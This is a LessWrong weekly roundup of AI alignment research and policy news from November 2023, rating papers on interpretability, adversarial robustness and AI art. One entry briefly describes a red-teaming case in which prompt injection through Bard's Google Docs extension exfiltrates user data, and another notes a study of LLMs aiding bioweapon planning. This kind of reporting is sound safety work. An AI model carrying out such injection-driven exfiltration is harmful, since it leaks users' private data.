AI Alignment [Progress] this Week (11/05/2023)

Logan Zoellner

The biggest news of this week is probably the two new AI Alignment Initiatives.

Otherwise, this was a relatively quiet week for AI Alignment breakthroughs.

So here are our

AI Alignment Breakthroughs this Week

This week there were breakthroughs in the areas of:

Mechanistic Interpretability

Avoiding Adversarial Attacks

Human Augmentation

Making AI Do what we want

AI Art

Mechanistic Interpretability

Research on the limits of Generalization in LLMs

What is it: Shows that LLMs are unable to generalize outside of their training data

What’s new: A systematic study of the types of generalization that LLMs can do ((in domain learning) and the types they can’t (out of domain learning)

What does it mean: Understanding the limits of LLMs should help us better understand where they can be safely deployed

Rating: 💡💡💡

Does appealing to AI “emotions” make them preform better?

What is it: Researchers find you can make LLMs answer questions better by using emotion

What’s new: new prompting strategies such as “this is important for my career”

What is it good for: In addition to purely improved performance, the really question is why does this work. Is there some “try harder” vector in the latent space that we can identify and exploit?

Rating: 💡💡

LLMs Generalized Truthfulness Across Agents

What is it: a way to tell true statements from false ones using LLMs

What’s new: they find evidence that LLMs have different “personas” that they use to judge whether something is true or not

What is it good for: Perhaps we can extract these personas and use them for alignment.

Rating: 💡💡💡💡

Avoiding Adversarial Attacks

Self Destructing Models

What it is: Pretrain a model so that it cannot be later fine-tuned for harmful purposes?

What’s new: They find meta-parameters such that fine-tuning a model on one task reduces its usefulness for other tasks

What is it good for: Hypothetically you could open-source a model and not have all of the RLHF safety features immediately removed by fine-tuning

Rating:💡💡(important topic, but I’m not convinced this technique works. More optimistic about techniques like Concept Erasure)

Data Exfiltration

What is it: an example of an attack that uses prompt injection to exfiltrate data from Google Bard

What’s new: they use Bard’s Google Doc extension to exfiltrate data

What is it good for: red-teaming these kinds of attacks is the first step to fixing them

Rating: 💡

Will releasing the weights of large language models grant widespread access to pandemic agents?

What is it: exactly what it says on the tin

What’s new: they simulate someone trying to build a harmful bio-weapon with/without an LLM and find the LLM helps

What is it good for: There’s been pretty strong pushback against this from e/acc, with people noting that this is also true of Google Search, or a hypothetical drug that increased everyone in the world’s IQ by 1 point. The larger point remains that we should identify dangerous capabilities and act to mitigate them. “Regulate uses not research” is the rallying cry of Midwit Alignment.

Rating: 💡

Human Augmentation

SignAvatars

What is it: a 3d sign language dataset

What’s new: first dataset of its kind

What is it good for: Train a model to automatically convert speech into sign language

Rating: 💡💡💡

Making AI Do what we want

Commonsense Norms

What is it: answer moral questions using visual data

What’s new: They use a LM to generate a multimodal benchmark set of various moral quandries

What is it good for: If we want robots or self-driving cars to behave ethically, they will have to rely on visual input to do so

Rating:💡💡

Agent Instructs Large Language Models to be General Zero-Shot Reasoners

What is it: train an agent to follow instructions

What’s new: they first have the agent access web resources before generating step-by-step instructions

What is it good for: Accurately doing tasks such as classification

Rating: 💡💡💡

AI Art

360-to-gaussian-splat

What is it: a new program for converting a 360 degree photo into a 3d scene

What’s new: they train a 3d-aware diffusion model to allow them to calculate novel views

What is it good for: convert any 360 degree photo (and soon I expect video) into a full 3d scene you can walk around in

Rating: 💡💡💡

Distill Whisper

What is it: A faster version of the speech-to-text model whisper

What’s new: they distill the model down to one that’s 49% smaller

What is it good for: this unlocks text-to-speech in places like mobile or web where it would have previously been too slow.

Rating: 💡💡

DeepMotion

What is it: an AI model trained to generate motion for 3d models

What’s new: Not open source, but seems better than past versions of this I’ve seen

What is it good for: animating all of those sweet models that you’re generating with text-to-3d.

Rating: 💡💡💡

AI Alignment Initiatives

The Biden Executive Order on AI

What is it: The most notable provision being that models trained with than 10**26 flops and data centers with a capacity of more than 10**20 flops/sec must register with the government. This limit appears to have been chosen not for any scientific reason, but because it is slightly larger than the largest current models. There’s also some ominous language about open-source models, but no actual regulations so far.

What does it mean: Doomers will say this doesn’t go far enough. E/ACC is already preparing to flee for friendlier waters (this particular project is a joke). The most important fact isn’t the order itself (which is not a law and thus has limited enforcement mechanisms) but that this sets the tone for future regulation. Expect more of the same in the future: technical limits set for political reasons not scientific ones, emphasis on whatever the current administration’s pet-projects are (Biden likes unions hates discrimination, and wants to cure cancer), and more words than action (since we still have to compete with China after all).

Overall Rating:🧓🏻🧓🏻🧓🏻 (3 Joe Bidens, could have been worse)

Bletchley Park Declaration

What is it: a joint statement by a number of countries agreeing to mitigate AI risk

What does it mean: The most important signature on this list is undoubtedly China. Much like global warming, China is probably the single biggest contributor to AI risk. They have the computing heft to build powerful systems, but are more likely to cut safety standards due to the perceive need to “race” to catch up with the US. And an AI broadly trained with the values of the CCP is less likely to be benevolent. I wouldn’t expect miracles, but hopefully this indicates a willingness by the Chinese to at least follow the common consensus on AI safety standards.

Rating: 🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳

This is not AI Alignment

An amusing short-story (long tweet?) By EY

What it is: A reminder that EY is a very good fiction writer

What does it mean: It is funny and worth reading.

Overall Rating: 📃📃📃📃(4 letters of self-reflection)

Small LLMs

What it is: There are an increasing number of small LLMs in the “better than GPT 3.5” category including OpenChat, Grok and Yi-34B. Importantly anyone with a modestly good PC can run OpenChat or Yi-34B on their personal computer.

What does it mean: A little over a year an a half after the release of GPT3.5, the technology has now become so widespread that there are multiple independent replications. If technology really is increasing at a hyper-exponential rate, we should expect smaller and smaller time-gaps between the leading edge and widespread availability (and paradoxically larger and larger capability gaps). One key thing to track might be to see how long before we have widespread models better than GPT4.

Rating:🤖🤖🤖+🤖/2 (3.5 large language models)

LESSWRONG
LW

LESSWRONG
LW

24

AI Alignment [Progress] this Week (11/05/2023)

24

AI Alignment Breakthroughs this Week

Mechanistic Interpretability

Avoiding Adversarial Attacks

Human Augmentation

Making AI Do what we want

AI Art

AI Alignment Initiatives

This is not AI Alignment

24

24